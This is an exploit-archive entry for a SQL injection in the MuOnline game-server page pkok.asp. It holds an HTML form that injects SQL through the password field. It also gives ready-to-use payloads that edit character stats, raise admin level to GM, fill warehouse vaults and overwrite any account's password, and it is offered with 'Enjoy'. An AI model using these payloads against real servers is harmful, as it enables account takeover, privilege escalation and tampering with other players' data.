MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit

2005-10-15T00:00:00
ID 1337DAY-ID-189
Type zdt
Reporter nukedx
Modified 2005-10-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit
==============================================================





<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address

Some SQL Examples:

-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--

Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord

Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2

-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--

ITEMCODE is which u can get from itemproject.exe u can find it on google ;)

-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->

<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>



#  0day.today [2018-03-13]  #